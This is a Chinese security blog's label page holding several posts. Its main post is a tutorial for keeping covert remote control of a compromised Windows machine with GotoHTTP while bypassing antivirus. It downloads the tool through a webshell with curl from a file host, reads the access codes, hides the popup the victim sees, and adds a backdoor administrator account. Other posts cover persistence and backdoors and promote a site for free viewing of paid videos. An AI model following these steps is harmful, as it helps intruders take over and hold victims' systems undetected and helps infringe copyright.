Showing posts with label Hacker. Show all posts
Showing posts with label Hacker. Show all posts

Monday, May 20, 2024

【远程控制】GotoHTTP 无视杀软实现远控

 

使用场景

在目标机器有杀毒软件拦截的情况下,CS 可能无法上线。这时候可以用 todesk 或向日葵这种远控工具进行横向移动,不过这两个工具由于国产化,可能不怎么方便。所以本篇文章介绍一下GotoHTTP这个远控软件的使用,演示场景:目标机器为Windows机器

需要注意的是,官网下载的客户端为被控端,控制端需要在GotoHTTP的官方网站进行远控。

官网 & 控制端:GotoHTTP – 在线远程控制平台

图片[1] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

优缺点分析

优点:

  • B2C 模式,无需安装控制端软件,有浏览器就可以远控。
  • 流量走 https 协议,只要目标放行 443 端口出口就可以实现内网穿透。
  • 在低带宽也可以使用,运行占用内存极低,控制时占用 CPU 仅为 0%-3%。
  • 被控端在类 Linux 系统上支持图形界面(GUI)和字符界面(CLI)。

缺点:

  • 需要管理员权限运行
  • 一些行为(网络唤醒远程主机)需要加载驱动,导致运行时 360 安全卫士会拦截这行为,其他杀软则不会拦截。

使用方式及场景

拥有完全权限

在掌握目标的完全权限情况下:管理员权限以及远程桌面权限,那么可以直接将GotoHTTP的被控端放到目标机器上执行。打开窗口内含电脑ID远控码,同时在执行程序的当前目录下,生成gotohttp.ini文件,文件内同样包含电脑ID远控码

图片[2] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

然后在GotoHTTP官网输入控制码,即可远控!

图片[3] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell
图片[4] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

只拥有命令行权限

这种情况下多数是拥有管理员的命令行权限,如上了WebShell拥有命令行权限,但是上不了远程。在这种情况下就可以使用此方法了。

如果有WebShell管理端的话,直接上传GotoHTTP的控制端文件,没有的话请看下面!

先想办法上传 GotoHTTP的被控端程序,生成一个下载直链,这边演示的是使用 https://temp.sh/进行上传后生成一个临时文件。

图片[5] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

在上传后成功获得一个下载直链,需要注意的是:temp.sh这个网站,上传后获得的直链,GET访问是文件详细的HTML页面而非文件,POST访问才是下载文件!

在你的WebShell端的命令执行页面或其他可以命令执行的地方,执行下载命令:

curl -X POST -o GotoHTTP.exe <你的下载直链>
图片[6] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

然后运行在目标机器下载的GotoHTTP.exe,执行命令:GotoHTTP.exe,运行GotoHTTP,然后成功生成gotohttp.ini文件,说明成功运行了!

图片[7] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

通过读取gotohttp.ini配置文件,读取远控码!name为电脑ID,tmp为控制码

图片[8] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

接着打开打开在线连接网站:https://gotohttp.com/,输入电脑 ID (name) 和控制码 (tmp) ,执行远控即可!

图片[9] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

注意事项:成功连接后目标机会自动出现这个弹窗,手速要快,把它最小化

图片[10] - 【远程控制】GotoHTTP 无视杀软实现远控 - 极核GetShell

总结

GotoHTTP 可以成功绕过免杀进行远控但是需要的前提是有命令执行和文件上传功能,命令下载文件的话需要目标机器上面装有 curl (应该还有其他方法)。

而且连接成功后如果目标机器锁屏的话那也还是进不去桌面的!解决方法

  • 创建一个用户:net user <username> <password> /add
  • 添加 XX 到管理员账户net loaclgroup administrators <username> /add

Thursday, March 26, 2020

19个练习黑客技术的在线网站

进攻即是最好的防御,这句话同样适用于信息安全的世界。这里罗列了19个合法的来练习黑客技术的网站,不管你是一名开发人员、安全工程师、代码审计师、渗透测试人员,通过不断的练习才能让你成为一个优秀安全研究人员。以下网站希望能给各位安全小伙伴带来帮助!若有其他的补充和推荐,欢迎给小编留言(排名不分先后)

国外

1、bWAPP
免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。
地址:itsecgames

Wednesday, March 25, 2020

内网渗透之——权限维持(获取windows、linux密码,安装后门程序)

介绍

当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了

目的

由于攻击可能被发现,被发现后可能会被将之前拿到的的webshell清除,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的

获取系统登陆账号密码

windows获取系统登陆账号密码

windows系统账号密码存储位置:
C:\Windows\System32\config\SAM
windows密码验证原理: 在Windows系统中,对用户账户的安全管理采用了SAM(Security Account Manager,安全账号管理)机制,用户账户以及密码经过Hash加密之后,都保存在SAM数据库中。 SAM数据库保存在C:\WINDOWS\system32\config\SAM文件中,当用户登录系统时,首先就要与SAM文件中存放的账户信息进行对比,验证通过方可登录。系统对SAM文件提供了保护机制,无法将其复制或是删除,也无法直接读取其中的内容。
SAM文件加密方式: 1.LM加密:Windows2003之前,包括win2003系统 2.NTLM加密:Windows 2003之后的系统 LM和NTLM都是基于Hash加密,但是它们的安全机制和安全强度存在差别,LM口令散列的安全性相对比较差。尽管现在已很少有人使用Windows2k之前的老版本系统,但为了保持向后兼容性,默认情况下,系统仍会将用户密码分别用这两种机制加密后存放在SAM数据库里。区别: LM加密,密码最多14位,如果口令不足14位,不足的部分用0补齐,把所有的字符转变为大写,然后分成两组,每组7位,分别加密,然后拼接在一起,就是最终的LM散列,本质是DES加密。 NTLM加密,先将用户口令转变为unicode编码,再进行标准MD4单向哈希加密。 LM加密安全性远低于NTLM加密,因为NTLM加密它允许使用更长的密码,允许有大小写的不同,而且也无须把密码分割成更小、更易于被破解的块。所以在一个纯NTLM环境中,应该关闭Lan Manager加密方式

Saturday, November 16, 2019

全网VIP视频在线看

1.全网VIP视频在线看
只需要把腾讯、爱奇艺、优酷、芒果tv等视频播放链接输入就可以看了,不管是VIP的、付费的,关键还无广告,真TM爽,如果配合油猴插件一起使用,味道更好
链接地址:http://vip.coolhii.com/video/s



2、大数据时代
现在很多数据,什么公开的、私密的、漏点的、正规的等很多都在百度网盘中,现在市面上的网盘搜索引擎都是在完犊子,没几个好用不是他们没数据,主要是一些总所周知的原因你懂的。网站是不行了,调用接口还可以。
如下我发现的:https://www.xiaocongjisuan.com/show/api/2 ,数据啊,只有你想不到的,没有它搜索不到的

Tuesday, November 12, 2019

一个分析被黑网站的安全工作日志记录

分享信息安全工作小记
1、    某厅级部门政府站点被篡改
2、    上级主管部门安全通告
3、    配合该部门查明原因限期整改

1、     信息收集

A、首先到机房了解了一下拓扑图,大概就是:互联网-防火墙-web应用防火墙-防篡改-DMZ服务器区;
B、然后了解了一下web应用程序架构,大概就是:3台服务器里面1台跑iis中间件1台跑sqlserver2008数据库,站库分离,服务器性能比较好,1syslog服务器接收日志;
C、网站属于.net开发,之前加固过:A、后台限制IP访问,BFCKEDITOR上传目录禁止执行,Csqlserver数据库降低权限使用network service并且关闭cmdshell等高危组件。

YouTube Channel